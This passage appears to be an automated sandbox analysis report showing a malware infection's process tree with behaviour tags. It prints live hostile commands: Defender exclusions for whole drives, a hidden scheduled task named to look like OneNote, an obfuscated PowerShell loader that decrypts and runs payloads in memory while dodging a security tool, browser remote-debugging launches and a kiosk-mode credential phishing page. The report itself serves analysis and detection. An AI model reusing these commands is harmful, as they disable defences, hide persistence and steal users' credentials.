                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                          PID:5680
                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')
                                                                                                          11⤵
                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                          PID:1712
                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\10002870122\UpdatedAdmin')
                                                                                                          11⤵
                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                          PID:2744
                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 5846' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network5846Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                                                                                                          11⤵
                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                          PID:6140
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          "C:\Windows\System32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Roaming\Network5846Man.cmd"
                                                                                                          11⤵
                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                          PID:5708
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\Network5846Man.cmd"
                                                                                                            12⤵
                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                            PID:4804
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Network5846Man.cmd';$nPrC='LoGoteadGote'.Replace('Gote', ''),'FITAkrITAkomBITAkaITAksITAke6ITAk4SITAktrITAkingITAk'.Replace('ITAk', ''),'EwCHintwCHirwCHiywCHiPwCHioiwCHintwCHi'.Replace('wCHi', ''),'SpePUtlitePUt'.Replace('ePUt', ''),'DecYisdompYisdrYisdeYisdsYisdsYisd'.Replace('Yisd', ''),'TsNkHrasNkHnssNkHfosNkHrsNkHmFsNkHinsNkHalsNkHBlosNkHcsNkHksNkH'.Replace('sNkH', ''),'CrfXbxeatfXbxeDfXbxecrfXbxypfXbxtfXbxorfXbx'.Replace('fXbx', ''),'MMLdxaMLdxinMLdxMoMLdxduMLdxleMLdx'.Replace('MLdx', ''),'ElIeKReIeKRmIeKReIeKRnIeKRtAIeKRtIeKR'.Replace('IeKR', ''),'InHUKcvHUKcokHUKceHUKc'.Replace('HUKc', ''),'ReazMwFdLzMwFizMwFneszMwF'.Replace('zMwF', ''),'ChaJonanaJongeEaJonxtaJonenaJonsaJoniaJonoaJonnaJon'.Replace('aJon', ''),'GepcketpckeCpckeurpckerepckentPpckerocpckeepckesspcke'.Replace('pcke', ''),'CQogZopQogZyTQogZoQogZ'.Replace('QogZ', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($nPrC[12])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function kMdJS($RQSTg){$zmvMN=[System.Security.Cryptography.Aes]::Create();$zmvMN.Mode=[System.Security.Cryptography.CipherMode]::CBC;$zmvMN.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$zmvMN.Key=[System.Convert]::($nPrC[1])('ML5/q9cXAh8zwmdF4WccY8ENAkFEsjrEy+dUpWTmk7k=');$zmvMN.IV=[System.Convert]::($nPrC[1])('zFU4xrxhUym0St+7yBu7eA==');$pWysh=$zmvMN.($nPrC[6])();$OefOm=$pWysh.($nPrC[5])($RQSTg,0,$RQSTg.Length);$pWysh.Dispose();$zmvMN.Dispose();$OefOm;}function PFVVL($RQSTg){$eAKke=New-Object System.IO.MemoryStream(,$RQSTg);$LAgIa=New-Object System.IO.MemoryStream;$nDRnz=New-Object System.IO.Compression.GZipStream($eAKke,[IO.Compression.CompressionMode]::($nPrC[4]));$nDRnz.($nPrC[13])($LAgIa);$nDRnz.Dispose();$eAKke.Dispose();$LAgIa.Dispose();$LAgIa.ToArray();}$LXMkx=[System.IO.File]::($nPrC[10])([Console]::Title);$NXZhU=PFVVL (kMdJS ([Convert]::($nPrC[1])([System.Linq.Enumerable]::($nPrC[8])($LXMkx, 5).Substring(2))));$MPjpB=PFVVL (kMdJS ([Convert]::($nPrC[1])([System.Linq.Enumerable]::($nPrC[8])($LXMkx, 6).Substring(2))));[System.Reflection.Assembly]::($nPrC[0])([byte[]]$MPjpB).($nPrC[2]).($nPrC[9])($null,$null);[System.Reflection.Assembly]::($nPrC[0])([byte[]]$NXZhU).($nPrC[2]).($nPrC[9])($null,$null); "
                                                                                                              13⤵
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              PID:2952
                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              13⤵
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              PID:1140
                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                                                                                                14⤵
                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                PID:4020
                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')
                                                                                                                14⤵
                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                PID:5748
                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\Network5846Man')
                                                                                                                14⤵
                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                PID:3524
                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 5846' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network5846Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                                                                                                                14⤵
                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                PID:5640
                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 1140 -s 2512
                                                                                                                14⤵
                                                                                                                • Program crash
                                                                                                                PID:316
                                                                                          • C:\Users\Admin\AppData\Local\Temp\1011445001\rhnew.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\1011445001\rhnew.exe"
                                                                                            4⤵
                                                                                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                            • Checks BIOS information in registry
                                                                                            • Executes dropped EXE
                                                                                            • Identifies Wine through registry keys
                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:4080
                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4080 -s 536
                                                                                              5⤵
                                                                                              • Program crash
                                                                                              PID:3876
                                                                                          • C:\Users\Admin\AppData\Local\Temp\1011459001\dee7fa7ddf.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\1011459001\dee7fa7ddf.exe"
                                                                                            4⤵
                                                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                            • Checks BIOS information in registry
                                                                                            • Checks computer location settings
                                                                                            • Executes dropped EXE
                                                                                            • Identifies Wine through registry keys
                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                            • Drops file in Windows directory
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            PID:4716
                                                                                            • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"
                                                                                              5⤵
                                                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                              • Checks BIOS information in registry
                                                                                              • Checks computer location settings
                                                                                              • Executes dropped EXE
                                                                                              • Identifies Wine through registry keys
                                                                                              • Adds Run key to start application
                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              PID:792
                                                                                              • C:\Users\Admin\AppData\Local\Temp\1005114001\663bb1178a.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\1005114001\663bb1178a.exe"
                                                                                                6⤵
                                                                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                • Checks BIOS information in registry
                                                                                                • Checks computer location settings
                                                                                                • Executes dropped EXE
                                                                                                • Identifies Wine through registry keys
                                                                                                • Loads dropped DLL
                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                • Checks processor information in registry
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                PID:1660
                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                                                                                                  7⤵
                                                                                                  • Uses browser remote debugging
                                                                                                  • Enumerates system info in registry
                                                                                                  • Modifies data under HKEY_USERS
                                                                                                  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                  PID:3800
                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffcd5c2cc40,0x7ffcd5c2cc4c,0x7ffcd5c2cc58
                                                                                                    8⤵
                                                                                                      PID:4000
                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1888,i,12789901111244859665,17449267893684059362,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1884 /prefetch:2
                                                                                                      8⤵
                                                                                                        PID:812
                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2136,i,12789901111244859665,17449267893684059362,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2144 /prefetch:3
                                                                                                        8⤵
                                                                                                          PID:2920
                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2212,i,12789901111244859665,17449267893684059362,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2608 /prefetch:8
                                                                                                          8⤵
                                                                                                            PID:4472
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3092,i,12789901111244859665,17449267893684059362,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3172 /prefetch:1
                                                                                                            8⤵
                                                                                                            • Uses browser remote debugging
                                                                                                            PID:2040
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3100,i,12789901111244859665,17449267893684059362,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3196 /prefetch:1
                                                                                                            8⤵
                                                                                                            • Uses browser remote debugging
                                                                                                            PID:1268
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4552,i,12789901111244859665,17449267893684059362,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4584 /prefetch:1
                                                                                                            8⤵
                                                                                                            • Uses browser remote debugging
                                                                                                            PID:4704
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4792,i,12789901111244859665,17449267893684059362,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4800 /prefetch:8
                                                                                                            8⤵
                                                                                                              PID:5656
                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4484,i,12789901111244859665,17449267893684059362,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4952 /prefetch:8
                                                                                                              8⤵
                                                                                                                PID:5716
                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"
                                                                                                              7⤵
                                                                                                              • Uses browser remote debugging
                                                                                                              • Enumerates system info in registry
                                                                                                              • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                              PID:4784
                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xe4,0x108,0x7ffcd5c346f8,0x7ffcd5c34708,0x7ffcd5c34718
                                                                                                                8⤵
                                                                                                                • Checks processor information in registry
                                                                                                                • Enumerates system info in registry
                                                                                                                PID:4820
                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1988,10447772114896797207,2787570481605510695,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2000 /prefetch:2
                                                                                                                8⤵
                                                                                                                  PID:5240
                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1988,10447772114896797207,2787570481605510695,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 /prefetch:3
                                                                                                                  8⤵
                                                                                                                    PID:5248
                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1988,10447772114896797207,2787570481605510695,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2804 /prefetch:8
                                                                                                                    8⤵
                                                                                                                      PID:5404
                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=1988,10447772114896797207,2787570481605510695,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1
                                                                                                                      8⤵
                                                                                                                      • Uses browser remote debugging
                                                                                                                      PID:5464
                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=1988,10447772114896797207,2787570481605510695,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:1
                                                                                                                      8⤵
                                                                                                                      • Uses browser remote debugging
                                                                                                                      PID:5684
                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=1988,10447772114896797207,2787570481605510695,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4796 /prefetch:1
                                                                                                                      8⤵
                                                                                                                      • Uses browser remote debugging
                                                                                                                      PID:1896
                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=1988,10447772114896797207,2787570481605510695,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4832 /prefetch:1
                                                                                                                      8⤵
                                                                                                                      • Uses browser remote debugging
                                                                                                                      PID:612
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\Documents\AEGHCFIDAK.exe"
                                                                                                                    7⤵
                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                    PID:4280
                                                                                                                    • C:\Users\Admin\Documents\AEGHCFIDAK.exe
                                                                                                                      "C:\Users\Admin\Documents\AEGHCFIDAK.exe"
                                                                                                                      8⤵
                                                                                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                      • Checks BIOS information in registry
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Identifies Wine through registry keys
                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                      PID:5100
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\1005115001\3a27476f99.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\1005115001\3a27476f99.exe"
                                                                                                                  6⤵
                                                                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                  • Checks BIOS information in registry
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Identifies Wine through registry keys
                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                  PID:1180
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 1180 -s 1540
                                                                                                                    7⤵
                                                                                                                    • Program crash
                                                                                                                    PID:5908
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\1011475001\663bb1178a.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\1011475001\663bb1178a.exe"
                                                                                                              4⤵
                                                                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                              • Checks BIOS information in registry
                                                                                                              • Executes dropped EXE
                                                                                                              • Identifies Wine through registry keys
                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              PID:1476
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\1011476001\790db7793c.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\1011476001\790db7793c.exe"
                                                                                                              4⤵
                                                                                                              • Enumerates VirtualBox registry keys
                                                                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                              • Checks BIOS information in registry
                                                                                                              • Executes dropped EXE
                                                                                                              • Identifies Wine through registry keys
                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              PID:5452
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\1011477001\01c06f74eb.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\1011477001\01c06f74eb.exe"
                                                                                                              4⤵
                                                                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                              • Checks BIOS information in registry
                                                                                                              • Executes dropped EXE
                                                                                                              • Identifies Wine through registry keys
                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              PID:5228
                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5228 -s 1556
                                                                                                                5⤵
                                                                                                                • Program crash
                                                                                                                PID:1116
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\1011478001\6293d779b0.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\1011478001\6293d779b0.exe"
                                                                                                              4⤵
                                                                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                              • Checks BIOS information in registry
                                                                                                              • Executes dropped EXE
                                                                                                              • Identifies Wine through registry keys
                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              PID:4116
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\1011479001\94bcd22a0e.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\1011479001\94bcd22a0e.exe"
                                                                                                              4⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                              • Suspicious use of SendNotifyMessage
                                                                                                              PID:2980
                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                taskkill /F /IM firefox.exe /T
                                                                                                                5⤵
                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                • Kills process with taskkill
                                                                                                                PID:5268
                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                taskkill /F /IM chrome.exe /T
                                                                                                                5⤵
                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                • Kills process with taskkill
                                                                                                                PID:2024
                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                taskkill /F /IM msedge.exe /T
                                                                                                                5⤵
                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                • Kills process with taskkill
                                                                                                                PID:2876
                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                taskkill /F /IM opera.exe /T
                                                                                                                5⤵
                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                • Kills process with taskkill
                                                                                                                PID:4292
                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                taskkill /F /IM brave.exe /T
                                                                                                                5⤵
                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                • Kills process with taskkill
                                                                                                                PID:5100
                                                                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                                                                                                5⤵
                                                                                                                  PID:6020
                                                                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                                                                                                    6⤵
                                                                                                                    • Checks processor information in registry
                                                                                                                    • Modifies registry class
                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                    PID:4400
                                                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2028 -parentBuildID 20240401114208 -prefsHandle 1940 -prefMapHandle 1932 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1e31d302-18c5-42e8-affa-cd0304f54fca} 4400 "\\.\pipe\gecko-crash-server-pipe.4400" gpu
                                                                                                                      7⤵
                                                                                                                        PID:2892
                                                                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2468 -parentBuildID 20240401114208 -prefsHandle 2444 -prefMapHandle 2440 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {81d15451-ab02-4c5c-856c-7cad1a81a41b} 4400 "\\.\pipe\gecko-crash-server-pipe.4400" socket
                                                                                                                        7⤵
                                                                                                                          PID:4720
                                                                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3120 -childID 1 -isForBrowser -prefsHandle 3112 -prefMapHandle 3108 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ee58f039-37dd-4ceb-8957-60c18acd4263} 4400 "\\.\pipe\gecko-crash-server-pipe.4400" tab
                                                                                                                          7⤵
                                                                                                                            PID:1496
                                                                                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3940 -childID 2 -isForBrowser -prefsHandle 3932 -prefMapHandle 3928 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 892 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {88c15f98-201d-4112-8a56-d11aeda7ead2} 4400 "\\.\pipe\gecko-crash-server-pipe.4400" tab
